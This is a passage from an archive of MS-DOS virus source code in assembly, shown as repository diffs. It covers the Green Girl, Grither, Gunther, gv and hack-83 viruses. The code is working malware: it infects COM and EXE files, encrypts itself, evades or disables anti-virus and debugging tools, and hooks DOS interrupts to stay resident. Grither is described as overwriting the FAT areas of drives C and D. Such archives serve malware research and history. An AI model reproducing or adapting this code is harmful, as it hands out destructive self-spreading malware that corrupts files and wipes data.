ORIG_3 DB 3 DUP(?) ; Original .COM file bytes
;
; End Data area
;***************************************************************************
;
POINTER_MOVER: ;
XOR CX,CX ;
XOR DX,DX ;
MOV AH, 042H ;
INT 021H ;
RET ;
;
COM_TIME: ; Checks for ibmdos.com, ibmbio.com, command.com
; So it works on PC/DOS and MS/DOS
MOV AL, BYTE PTR [OFFSET NEW_DTA_AREA+BP+01EH+2]
CMP AL,'M' ;
JNE NOT_DOS_FILE ;
JMP NOPE ;
;
NOT_DOS_FILE: ;
MOV AL,02H ;
CALL POINTER_MOVER ;
;
SUB DX,1 ; Jump to end of file-1
SBB CX,0 ;
MOV AX,04202H ;
INT 021H ;
;
MOV AH,03FH ; Read last byte of file
MOV CX,1 ;
LEA DX,OFFSET ORIG_3+BP ;
INT 021H ;
;
MOV AL,[OFFSET ORIG_3+BP]
CMP AL,'\' ;
JNE CHECK_IT ; Infect file
;
NOPE: ; Can't infect for some reason or another
CALL RESET_ATTRIBS ;
CALL CLOSE_FILE ;
MOV AH,04FH ;
JMP FINDER ; Already infected (It's my BAAAABBYYYY)
;
CHECK_IT: ;
XOR AL,AL ; Beginning of file
CALL POINTER_MOVER ;
;
MOV AH,03FH ; Read files first 3 bytes
MOV CX,3 ;
LEA DX,[OFFSET ORIG_3+BP]
INT 021H ;
;
MOV AL,[OFFSET ORIG_3+BP]
ADD AL,[OFFSET ORIG_3+BP+1]
CMP AX,'M'+'Z' ;
JE NOPE ;
;
INFECT_COM: ;
MOV AL,02H ;
CALL POINTER_MOVER ;
;
SUB AX,3 ; Calculate jump offset
MOV [OFFSET JUMPING+BP+1],AX
;
XOR AL,AL ; Beginning of file
CALL POINTER_MOVER ;
;
MOV CX,3 ; Write jump bytes
MOV AH,040H ;
LEA DX,OFFSET JUMPING+BP;
INT 021H ;
;
; So that the infected file will look for
; .EXE's on the first run and not .COM's,
; this code here must be added
MOV WORD PTR [OFFSET FILE_MASK+BP+2],'XE'
MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'E'
; Make sure that when the virus runs of it's new
; .COM host, it knows it and isn't running as if
; it was on the old host <i.e. restore host
; as a .COM and not a .EXE>
MOV AL,[OFFSET COM_OR_EXE+BP]
PUSH AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],2
JMP END_WRITER ;
;
FILE_FOUND: ;
MOV AX, 04300H ; Get and save attribs
LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH]
INT 21H ;
;
MOV [OFFSET ATTRIBS+BP],CX
MOV WORD PTR [OFFSET TIME+BP],[OFFSET NEW_DTA_AREA+BP+016H]
MOV WORD PTR [OFFSET DATE+BP],[OFFSET NEW_DTA_AREA+BP+018H]
;
CHANGE_ATTRIBS_NORMAL: ; Change attributes to NULL
MOV AX,04301H ;
XOR CX,CX ;
LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH]
INT 021H ;
JNC OPEN_FILE ;
MOV AH,04FH ;
JMP FINDER ; Somefink went wrong!
;
OPEN_FILE: ; Open da file
MOV AX,03D02H ;
LEA DX,OFFSET NEW_DTA_AREA+BP+01EH
INT 021H ;
JNC WHAT_WRITE_ROUTINE ;
MOV AH,04FH ;
JMP FINDER ; Somefink else went wrong!
;
WHAT_WRITE_ROUTINE: ; Write to a .COM or .EXE
XCHG BX,AX ; Put file handle in BX
CMP BYTE PTR [OFFSET FILE_MASK+BP+2],'E'
JE CHECK_INFECTED ;
JMP COM_TIME ;
;
CHECK_INFECTED: ; Read in file header
MOV CX,01AH ; .EXE header is (01Ah bytes)
MOV AH,3FH ;
LEA DX,OFFSET FILE_HEADER+BP
INT 021H ;
; Check if it is already infected
CMP WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG'
JNE TEST_WIN ;
JMP NOPE ;
;
NEW_ERROR_HANDLER: ; New INT 024H handler
MOV AL,3 ; Fail system call <VLAD said to do this>
IRET ;
;
TEST_WIN: ;
MOV AX,[OFFSET FILE_HEADER+BP+018H]
CMP AX,040H ;
JB MODIFY_HEADER ; Not windows file
JMP NOPE ; Is windows file
;
MODIFY_HEADER: ; Begin transmorgification of the header
MOV AL,02H ; Get file size for later on
CALL POINTER_MOVER ;
;
PUSH BX ; Save handle
PUSH DX ; Save file size
PUSH AX ;
; TEMP_CSIP = Offset : Segment
LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+014H]
MOV WORD PTR [BP+OFFSET TEMP_CSIP], AX
MOV WORD PTR [BP+OFFSET TEMP_CSIP+02H], ES
; Save stack pointer
; TEMP_SSSP = Offset : Segment
LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+0EH]
MOV WORD PTR [BP+OFFSET TEMP_SSSP],ES
MOV WORD PTR [BP+OFFSET TEMP_SSSP+02H],AX
; Convert header size to bytes
; <originally in paragraphs>
MOV AX, WORD PTR [BP+FILE_HEADER+08H]
MOV CL,04H ;
SHL AX,CL ;
;
XCHG BX,AX ; BX now holds the header size in bytes
;
POP AX ; Get file size into DX:AX
POP DX ;
;
PUSH AX ; Save file size for later AGAIN
PUSH DX ;
;
SUB AX,BX ; Take header size from file size
SBB DX,0 ;
;
MOV CX,010H ; Make it segment:offset form
DIV CX ;
; Write new entry point
MOV WORD PTR [OFFSET FILE_HEADER+BP+014H],DX
MOV WORD PTR [OFFSET FILE_HEADER+BP+016H],AX
; Write new Stack
; Pointer and....
MOV WORD PTR [OFFSET FILE_HEADER+BP+010H],0
; Segment!
MOV WORD PTR [OFFSET FILE_HEADER+BP+0EH],AX
; Write ID bytes
MOV WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG'
;
POP DX ; Get file length
POP AX ;
; Add virus size
ADD AX,OFFSET END_VIRUS-OFFSET BEGIN
ADC DX,0 ;
;
MOV CL,9 ;
PUSH AX ; Save file size+virus size
;
SHR AX,CL ;
ROR DX,CL ;
STC ;
ADC DX,AX ; File size in pages
POP AX ;
AND AH,1 ; MOD 512
; Write new file size
MOV WORD PTR [BP+OFFSET FILE_HEADER+04H],DX
MOV WORD PTR [BP+OFFSET FILE_HEADER+02H],AX
; Increase minimum memory requirements to
; ORIG_MEM + VIRUS_MEM = TOTAL_MEM 8)
MOV AX,OFFSET END_FILE-OFFSET BEGIN
MOV CL,4 ;
SHR AX,CL ;
;
ADD AX,WORD PTR [BP+OFFSET FILE_HEADER+0AH]
MOV WORD PTR [BP+OFFSET FILE_HEADER+0AH],AX
;
POP BX ; Get handle again
;
MOOWAAHAAHAAHAA: ; Infect the wanker!
XOR AL,AL ; Move to da start of da file
CALL POINTER_MOVER ;
;
MOV CX,01AH ; Write header
MOV AH,040H ;
LEA DX,OFFSET FILE_HEADER+BP
INT 021H ;
; So that the virus, when executing of its
; new host knows that it will restore the bytes
; as if attatched to a .EXE file
MOV AL, BYTE PTR [OFFSET COM_OR_EXE+BP]
PUSH AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],1
;
END_WRITER: ;
MOV AL,02H ; Move to da end of da file
CALL POINTER_MOVER ;
;
MAKE_NEW_ENC_VALUE: ; Get a new random encryption value
MOV AH,2CH ;
INT 21H ;
MOV BYTE PTR [OFFSET ENCRYPTION_VALUE+BP],DL
;
END_XOR: ; End XOR here
; Make it my BAAAABBYYYY
CALL XORER ;
CALL NOTTER ;
;
MOV CX,OFFSET END_VIRUS-OFFSET BEGIN
MOV AH,40H ;
LEA DX,OFFSET BEGIN+BP ;
INT 021H ;
;
CALL NOTTER ; Decrypt virus
CALL XORER ;
; Restore original com_or_exe value
POP AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],AL
;
CALL RESET_ATTRIBS ;
CALL CLOSE_FILE ;
JMP END_ALL ;
;
;
XORER: ;
CLD ; String instruction increment
MOV ES,CS ;
MOV AH, [OFFSET ENCRYPTION_VALUE+BP]
MOV CX, OFFSET END_XOR-OFFSET START_XOR
LEA SI, [OFFSET START_XOR+BP]
MOV DI, SI ;
;
XOR_LOOPER: ;
LODSB ;
XOR AL,AH ;
STOSB ;
LOOP XOR_LOOPER ;
RET ;
;
NOTTER: ;
CLD ; Make sure string instructions increment
MOV ES,CS ;
MOV CX,OFFSET NOTTER-OFFSET XORER
LEA SI,[OFFSET XORER+BP]
MOV DI,SI ;
;
NOT_LOOPER: ;
LODSB ;
NOT AL ;
STOSB ;
LOOP NOT_LOOPER ;
RET ;
;
ENCRYPTION_VALUE DB 0 ;
ENC_OR_NOT DB 0 ; To encrypt or not to encrypt
SLASH DB '\' ; For directory traversal functions
;
END_VIRUS: ; Everything from here on is not written
; to infected files
;
DIR_BUFFER DB 64 DUP (?) ; For directory traversal functions
NEW_DTA_AREA DB 128 DUP (?) ; New DTA place
ATTRIBS DW 0 ; Buffer for file attributes
TIME DW 0 ; " " " time
DATE DW 0 ; " " " date
FILE_HEADER DB 01AH DUP (?) ; File Header Read/Write Buffer
OLD_ERROR DW 0,0 ; Hold old error handler address
OLD_DATA DB 512 DUP (?) ; Holds old boot block
;
END_FILE: ;
GREEN_GIRL ENDS ;
END BEGIN ;

2615
MSDOS/Virus.MSDOS.Unknown.greeting.asm Normal file
View File

File diff suppressed because it is too large Load Diff

330
MSDOS/Virus.MSDOS.Unknown.grither.asm Normal file
View File

@ -0,0 +1,330 @@
;**************************************************************************
;** GRITHER VIRUS **
;** Created: 27 Oct 1990 **
;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on **
;** *.COMs and will re-write the begining sectors of drive **
;** C: & D:! Erasing the FATs area... **
;** **
;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer! **
;** **
;**************************************************************************
data_1e equ 2Ch ; (65AC:002C=0)
data_2e equ 75h ; (65AC:0075=0)
data_3e equ 79h ; (65AC:0079=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
grither proc far
start:
;* jmp short loc_1 ;*(0112)
db 0EBh, 10h
db 90h
data_5 db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Qº', 9, 3, ò<E280B9>Æ' ; Data table (indexed access)
db 0Ah, 0
db 0BFh, 0, 1, 0B9h, 3, 0
db 0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h
db 0CDh, 21h, 3Ch, 0, 75h, 3
db 0E9h, 0C5h, 1
loc_2:
push es
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov [si+0],bx
nop ;*Fixup for MASM (M)
mov [si+2],es
nop ;*Fixup for MASM (M)
pop es
mov dx,5Fh
nop
add dx,si
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
push es
push si
mov es,ds:data_1e ; (65AC:002C=0)
mov di,0
loc_3:
pop si
push si
add si,1Ah
nop ;*Fixup for MASM (M)
lodsb ; String [si] to al
mov cx,8000h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov cx,4
locloop_4:
lodsb ; String [si] to al
scasb ; Scan es:[di] for al
jnz loc_3 ; Jump if not zero
loop locloop_4 ; Loop if cx > 0
pop si
pop es
mov [si+16h],di
nop ;*Fixup for MASM (M)
mov di,si
nop
add di,1Fh
nop ;*Fixup for MASM (M)
mov bx,si
add si,1Fh
nop ;*Fixup for MASM (M)
mov di,si
jmp short loc_10 ; (01B9)
loc_5:
cmp word ptr [si+16h],0
nop ;*Fixup for MASM (M)
jne loc_6 ; Jump if not equal
jmp loc_19 ; (02E9)
loc_6:
push ds
push si
mov ds,es:data_1e ; (65AC:002C=0)
mov di,si
mov si,es:[di+16h]
nop ;*Fixup for MASM (M)
add di,1Fh
nop ;*Fixup for MASM (M)
loc_7:
lodsb ; String [si] to al
cmp al,3Bh ; ';'
je loc_9 ; Jump if equal
cmp al,0
je loc_8 ; Jump if equal
stosb ; Store al to es:[di]
jmp short loc_7 ; (019B)
loc_8:
mov si,0
loc_9:
pop bx
pop ds
mov [bx+16h],si
nop ;*Fixup for MASM (M)
nop
cmp ch,5Ch ; '\'
je loc_10 ; Jump if equal
mov al,5Ch ; '\'
stosb ; Store al to es:[di]
loc_10:
mov [bx+18h],di
nop ;*Fixup for MASM (M)
mov si,bx
add si,10h
nop ;*Fixup for MASM (M)
mov cx,6
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov si,bx
mov ah,4Eh ; 'N'
mov dx,1Fh
nop
add dx,si
mov cx,3
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jmp short loc_12 ; (01DD)
loc_11:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
loc_12:
jnc loc_13 ; Jump if carry=0
jmp short loc_5 ; (017F)
loc_13:
mov ax,ds:data_2e[si] ; (65AC:0075=0)
and al,1Fh
cmp al,1Fh
je loc_11 ; Jump if equal
cmp word ptr ds:data_3e[si],0FA00h ; (65AC:0079=0)
ja loc_11 ; Jump if above
cmp word ptr ds:data_3e[si],0Ah ; (65AC:0079=0)
jb loc_11 ; Jump if below
mov di,[si+18h]
nop ;*Fixup for MASM (M)
push si
add si,7Dh
nop ;*Fixup for MASM (M)
loc_14:
lodsb ; String [si] to al
stosb ; Store al to es:[di]
cmp al,0
jne loc_14 ; Jump if not equal
pop si
mov ax,4300h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov [si+8],cx
nop ;*Fixup for MASM (M)
mov ax,4301h
and cx,0FFFEh
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ax,3D02h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_15 ; Jump if carry=0
jmp loc_18 ; (02DA)
loc_15:
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov [si+4],cx
nop ;*Fixup for MASM (M)
mov [si+6],dx
nop ;*Fixup for MASM (M)
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
and dh,7
jnz loc_16 ; Jump if not zero
mov ah,40h ; '@'
mov cx,85h
mov dx,si
add dx,8Ah
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jmp short loc_17 ; (02C3)
db 90h
loc_16:
mov ah,3Fh ; '?'
mov cx,3
mov dx,0Ah
nop
add dx,si
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,3
jne loc_17 ; Jump if not equal
mov ax,4202h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov cx,ax
sub ax,3
mov [si+0Eh],ax
nop ;*Fixup for MASM (M)
add cx,2F7h
mov di,si
sub di,1F5h
mov [di],cx
mov ah,40h ; '@'
mov cx,306h
mov dx,si
sub dx,1F7h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,306h
jne loc_17 ; Jump if not equal
mov ax,4200h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov ah,40h ; '@'
mov cx,3
mov dx,si
add dx,0Dh
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_17:
mov dx,[si+6]
nop ;*Fixup for MASM (M)
mov cx,[si+4]
nop ;*Fixup for MASM (M)
and cx,0FFE0h
or cx,1Fh
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_18:
mov ax,4301h
mov cx,[si+8]
nop ;*Fixup for MASM (M)
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_19:
push ds
mov ah,1Ah
mov dx,[si+0]
nop ;*Fixup for MASM (M)
mov ds,[si+2]
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
pop ds
loc_20:
pop cx
xor ax,ax ; Zero register
xor bx,bx ; Zero register
xor dx,dx ; Zero register
xor si,si ; Zero register
mov di,100h
push di
xor di,di ; Zero register
retn 0FFFFh
db 10 dup (0)
db 0CDh, 20h, 90h, 0E9h, 0, 0
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
db 0, 0, 0, 0, 50h, 41h
db 54h, 48h, 3Dh, 0, 0
db 105 dup (0)
db 0EBh, 58h, 90h
db ' `7O `88@99@6r `65@85M%AACC%YMJ%'
db 'LWNYMJW%AACC% `:@86@95r `68@87MH'
db 'tzwyjx~%tk%Jqj}nts `5r$'
db '3'
db 0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h
db 0A0h, 0, 33h, 0D2h, 0BBh, 0
db 0, 0CDh, 26h, 0BBh, 0, 0
loc_21:
cmp byte ptr data_5[bx],24h ; (65AC:0103=90h) '$'
je loc_22 ; Jump if equal
sub byte ptr data_5[bx],5 ; (65AC:0103=90h)
inc bx
jmp short loc_21 ; (0400)
loc_22:
mov dx,offset data_5 ; (65AC:0103=90h)
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; Program Terminate
grither endp
seg_a ends
end start


1207
MSDOS/Virus.MSDOS.Unknown.guerilla.asm Normal file
View File

File diff suppressed because it is too large Load Diff

422
MSDOS/Virus.MSDOS.Unknown.gunther.asm Normal file
View File

@ -0,0 +1,422 @@
; 'Gunther': A Virus From the Virus Creation 2000 System
; The Virus Creation 2000 System is Copywrited by John Burnette
; All Rights Reserved.
; Author: Havoc The Chaos
; Notes: F<>r my lurv, Kiersten B.
; Greetings: Dark Angel, DecimatoR, Dark Avenger (You still out there?)
; The Additude Adjuster, Mucho Mass, The Old Bit Truth Crew,
; and virus writters (Except those who rely on kits and call
; them original code) everywhere!
code segment byte public
assume cs: code
org 100h
id = '=-'
begin:
call next ; Get Delta Offset
next: pop bp
sub bp, offset next
push cs
push cs
pop ds
pop es
mov byte ptr [bp + lock_keys + 3], 244
; Prefetch Cue Unchanged
lock_keys:
mov al, 128 ; Screws DEBUG
out 21h, al ; If Tracing, Lock Keyboard
mov ax, 4653h ; Remove F-Prot Utils
mov bx, 1
mov cx, 2
rep int 2Fh
mov byte ptr cs:[tb_here][bp], 0 ; Reset TB Flag
xor dx, dx
mov ds, dx
mov ax, word ptr ds:[6]
dec ax
mov ds, ax
mov cx, 0FFFFh ; CX = 64k
mov si, dx ; SI = 0
look_4_tbclean:
mov ax, word ptr ds:[si]
xor ax, 0A5F3h
je check_it ; Jump If It's TBClean
look_again:
inc si ; Continue Search
loop look_4_tbclean
jmp not_found ; TBClean Not Found
check_it:
mov ax, word ptr ds:[si+4]
xor ax, 0006h
jne look_again
mov ax, word ptr ds:[si+10]
xor ax, 020Eh
jne look_again
mov ax, word ptr ds:[si+12]
xor ax, 0C700h
jne look_again
mov ax, word ptr ds:[si+14]
xor ax, 406h
jne look_again
mov bx, word ptr ds:[si+17] ; Steal REAL Int 1 Offset
mov byte ptr ds:[bx+16], 0CFh ; Replace With IRET
mov bx, word ptr ds:[si+27] ; Steal REAL Int 3 Offset
mov byte ptr ds:[bx+16], 0CFh ; Replece With IRET
mov byte ptr cs:[tb_here][bp], 1 ; Set The TB Flag On
mov bx, word ptr ds:[si+51h] ; Get 2nd Segment of
mov word ptr cs:[tb_int2][bp], bx ; Vector Table
mov bx, word ptr ds:[si-5] ; Get Offset of 1st Copy
mov word ptr cs:[tb_ints][bp], bx ; of Vector Table
not_found:
mov cx, 9EBh
mov ax, 0FE05h
jmp $-2
add ah, 3Bh ; Hlt Instruction (Kills TD)
jmp $-10
mov ax, 0CA00h ; Exit It TBSCANX In Mem
mov bx, 'TB'
int 2Fh
cmp al, 0
je okay
ret
okay:
mov ah, 47h
xor dl, dl
lea si, [bp+offset dir_buff+1] ; Save Original Directory
int 21h
push es ; New DTA
push ds
mov ah, 1Ah
lea dx, [bp+offset newDTA]
int 21h
lea di, [bp+offset origCSIP2] ; Save For EXE
lea si, [bp+offset origCSIP]
mov cx, 4
rep movsw
mov byte ptr [bp+numinfected], 0
mov ax, 3524h ; New INT 24h Handler
int 21h
mov ax, 2524h
mov dx, offset Int24
int 21h
traverse_path proc near
push bp
pop bx
mov es, word ptr cs:[2Ch] ; ES = Environment Segment
xor di, di ; DI = Starting Offset
find_path:
mov dx,'As'
int 0F2h
lea si,[bx + path_string] ; SI points to "PATH="
lodsb ; Load First Byte in AL
mov cx,08000h ; Check 32767 Bytes
repne scasb ; Search Until The Byte Is Found
mov cx,4 ; Check The Next Four Bytes
check_next_4:
lodsb ; Load The Next Letter of "PATH="
scasb ; Compare It To Environment
jne find_path ; Get Another
loop check_next_4 ; Keep Checking
mov word ptr [bx + path_ad], di ; Save The PATH Address
mov word ptr [bx + path_ad + 2], es ; Save The PATH's Segment
lds si,dword ptr [bx + path_ad] ; DS:SI Points to PATH
lea di,[bp - 70] ; DI = Work Buffer
push cs
pop es
move_subdir:
lodsb ; Load Next Byte
cmp al,';' ; Separator?
je moved_one ; Yes, We're Done
or al,al ; End of Path?
je moved_last_one ; Yes, Quit Our Loop
stosb ; Store Byte at ES:DI
jmp short move_subdir ; Keep Transfering Characters
moved_last_one:
xor si, si ; Clear Buffer
moved_one:
mov word ptr es:[bx + path_ad],si ; Store SI in the path address
cmp si, 0 ; Done?
je done ; Done.
mov ah, 3Bh ; Change Directory
lea dx, [bx + path_ad]
int 21h
lea dx, [di + com_spec] ; Find COM Files
call infect
lea dx, [di + exe_spec] ; Find EXE Files
call infect
lea dx, [di + ovr_spec] ; Find OV? Files
call infect
lea dx, [di + bin_spec] ; Find Binary Files
call infect
jmp move_subdir ; Get Another Sub-Directory
done: ret
traverse_path endp
pop ds ; Restore DTA
pop es
mov ah, 1Ah
mov dx, 80h
int 21h
cmp sp, id ; EXE?
jne infect
restore_exe: ; Restore EXE
mov ax, ds
add ax, 10h
add cs:[bp+word ptr origCSIP2+2], ax
add ax, cs:[bp+word ptr origSPSS2]
cli
mov ss, ax
mov sp, cs:[bp+word ptr origSPSS2+2]
sti
db 00EAh ; Jump To The Original Code
origCSIP2 db ?
old3_2 db ?,?,?
origSPSS2 dd ?
origCSIP db ?
old3 db 0cdh,20h,0
origSPSS dd ?
restore_com: ; Restore COM
mov di, 100h
push di
lea si, [bp+offset old3_2]
movsw
movsb
return: ret ; Jump To Original Code
infect:
mov cx, 7
mov ah, 4Eh ; Find First File
findfirstnext:
int 21h
jc return
cmp word ptr [bp+newDTA+33], 'AM' ; COMMAND.COM?
mov ah, 4Fh
jz findfirstnext ; Yes, So Get Another File
lea dx, [bp+newDTA+30] ; Get Attributes
mov ax, 4300h
int 21h
jc return
push cx ; Save Them
push dx
mov ax, 4301h ; Clear Attributes
push ax
xor cx, cx
int 21h
mov ax, 3D02h ; Open File, Read/Write
lea dx, [bp+newDTA+30]
int 21h
xchg ax, bx
mov ax, 5700h ; Get File Time/Date
int 21h
push cx ; Save Time/Date
push dx
mov ah, 3Fh
mov cx, 1Ah ; Read Into File
lea dx, [bp+offset readbuffer]
int 21h
mov ax, 4202h ; Move Pointer To End Of File
xor cx, cx
cwd
int 21h
cmp word ptr [bp+offset readbuffer], 'ZM' ; EXE?
jz checkexe
mov cx, word ptr [bp+offset readbuffer+1]
add cx, heap-begin+3 ; CX = Filesize
cmp ax, cx
jz jmp_close ; Already Infected
cmp ax, 65535-(endheap-begin) ; Too Large To Infect?
ja jmp_close
lea di, [bp+offset old3] ; Save First Three Bytes
lea si, [bp+offset readbuffer]
movsb
movsw
mov cx, 3 ; Encoded Jump To Virus
sub ax, cx
mov word ptr [bp+offset readbuffer+1], ax
mov dl, 0E9h
mov byte ptr [bp+offset readbuffer], dl
jmp short continue_infect
checkexe:
cmp word ptr [bp+offset readbuffer+10h], id
jnz skipp ; Not Infected, So Infect It
jmp_close:
jmp close ; Infected, So Quit
skipp: lea di, [bp+origCSIP]
lea si, [bp+readbuffer+14h]
movsw ; Save CS and IP
movsw
sub si, 0Ah ; Save SS and SP
movsw
movsw
push bx ; Filename
mov bx, word ptr [bp+readbuffer+8] ; Header Size
mov cl, 4
shl bx, cl
push dx
push ax
sub ax, bx ; File Size - Header Size
sbb dx, 0
mov cx, 10h
div cx
mov word ptr [bp+readbuffer+0Eh], ax ; SS
mov word ptr [bp+readbuffer+10h], id ; SP
mov word ptr [bp+readbuffer+14h], dx ; IP
mov word ptr [bp+readbuffer+16h], ax ; CS
pop ax
pop dx
add ax, heap-begin
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1
mov word ptr [bp+readbuffer+2], ax
mov word ptr [bp+readbuffer+4], dx ; Fix Header
pop bx
mov cx, 1Ah
continue_infect:
mov ah, 40h
mov cx, heap-begin ; Add Virus To The End
lea dx, [bp+offset begin]
int 21h
mov ax, 4200h
xor cx, cx ; Move Pointer To Beginning
cwd
int 21h
mov ah, 40h
mov cx, 1Ah ; Write Encoded Jump To Virus
lea dx, [bp+offset readbuffer]
int 21h
inc [bp+numinfected] ; Infection Good
close:
mov ax, 5701h ; Set Orig Date and Time
pop dx
pop cx
int 21h
mov ah, 3Eh ; Close File
int 21h
pop ax ; Restore Attributes
pop dx
pop cx
int 21h
cmp [bp+numinfected], 5
jae bye
mov ah, 4Fh ; No, So Find Another File
jmp findfirstnext
mov ax, 2524h ; New INT 24h Handler
pop dx
pop ds
int 21h
mov ah, 3Bh ; Function: Change Directory
lea dx, [bp+dir_buff] ; Restore Current Directory
int 21h ; Execute Function
bye: ret
Int24: mov ax, 3 ; Error Handling
iret
exe_spec db '*.EXE',0 ; EXE Filespec
ovr_spec db '*.OV?',0 ; OV? Filespec
bin_spec db '*.BIN',0 ; BIN Filespec
com_spec db '*.COM',0 ; COM Filespec
path_string db "PATH=" ; The PATH String To Search For
heap:
donebin db 0
dir_buff db 64 dup (0) ; Current Dir Buffer
newdta db 43 dup (?) ; New Disk Transfer Access
numinfected db ? ; Number Of Files Infected
path_ad dd ? ; Holds The PATH's Address
tb_ints dd 0
tb_int2 dd 0
tb_here db 0
readbuffer db 1ah dup (?)
endheap:
code ends
end begin

21
MSDOS/Virus.MSDOS.Unknown.gv.asm Normal file
View File

@ -0,0 +1,21 @@
xor cx,cx
mov dx,offset File
mov ah,4eh
int 21h
z:
mov dx,9eh
mov ax,3d02h
int 21h
mov bx,ax
mov dx,100h
mov cl,27h
mov ah,40h
int 21h
mov ah,3eh
int 21h
mov ah,4fh
int 21h
jnc z
ret
file db '*.com',0
e:

92
MSDOS/Virus.MSDOS.Unknown.hack-83.asm Normal file
View File

@ -0,0 +1,92 @@
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
;THE FOLLOWING CODE MAKES THE VIRUS GO RESIDENT. TO KEEP THE INFECTION
;CODE AS SHORT AS POSSIBLE, THE INT 21 VECTOR (4 BYTES) IS SAVED OUTSIDE
;THE VIRUS BODY. THIS MAY OCCASIONALLY CAUSE THE VECTOR TO BE OVERWRITTEN
;BY THE ENVIRONMENT, WHICH WILL CRASH THE SYSTEM. TO PREVENT THIS, DEFINE
;TWO WORDS FOR THE LABEL INT21 AND ADD FOUR BYTES TO THE RESIDENT CODE.
;THE FIRST TIME THAT AN "INFECTED" FILE IS RUN, IT WILL SIMPLY RETURN TO
;DOS. THIS IS BECAUSE THE RESIDENT CODE MUST FIRST BE LOADED. AFTER THAT
;EVERYTHING WILL APPEAR TO WORK NORMALLY. TO REMEDY THIS PROBLEM, ALTER
;THE MEMORY CONTROL BLOCK TO TRAP THE RESIDENT CODE, THEN JUMP TO IT. A
;STILL BETTER SOLUTION IS TO COPY THE VIRUS TO THE TOP OF MEMORY AND
;TRAP IT THERE. ALSO, DO NOT REVECTOR INTERRUPT BUT OVERWRITE THE
;ENTRY POINT WITH A FAR JUMP TO THE VIRUS AND THEN RESTORE IT. THESE
;TECHNIQUES WILL MAKE A BETTER, THOUGH LONGER VIRUS.
;
start: mov ax,3521h ;GET INT 21 VECTOR
int 21h
mov di,offset int21
mov [di],bx ;SAVE IT
mov [di+2],es
mov dx,offset infect
mov ah,25h
int 21h ;REVECTOR TO VIRUS
mov dx,di
int 27h ;GO RESIDENT
;
;THIS IS THE ACTUAL INFECTION CODE. IT CHECKS FOR THE EXEC FUNCTION THEN
;TRIES TO RUN THE PROCESS AS AN EXE. IF THIS FAILS, THE VIRUS KNOWS THAT
;IT REALLY WAS A COM PROGRAM, IN WHICH CASE IT SIMPLY LETS THE CALL GO
;THROUGH. OTHERWISE A SHADOW COM FILE IS (RE)CREATED, "INFECTING" THE
;EXE. THE HIDDEN ATTRIBUTE IS SET ON THE SHADOW FILE. TO KEEP THESE FILES
;VISIBLE, SET CX TO 0 INSTEAD OF 2.
;NOTE: UNDER DOS 5.0, REGISTERS ES AND DS ARE SAME WHEN THE EXEC CALL
;IS ISSUED. SETTING ES TO DS IS ONLY NECESSARY TO MAKE THE VIRUS RUN UNDER
;DOS 3.X. OTHERWISE YOU CAN ELIMINATE THESE INSTRUCTIOS, BRINGING THE VIRUS
;BACK TO JUST 79 BYTES.
;
infect: cmp ax,4b00h ;EXEC?
jne interrupt ;IF NOT, CONTINUE INTERRUPT
push ax ;KEEP FUNCTION CALL
push es ;KEEP ES
push ds ;SET ES TO DS
pop es
mov di,dx ;SCAN TO EXT
mov al,'.'
repne scasb
push di ;POINTER TO EXT
mov ax,'XE' ;TRY TO RUN AS .EXE
stosw
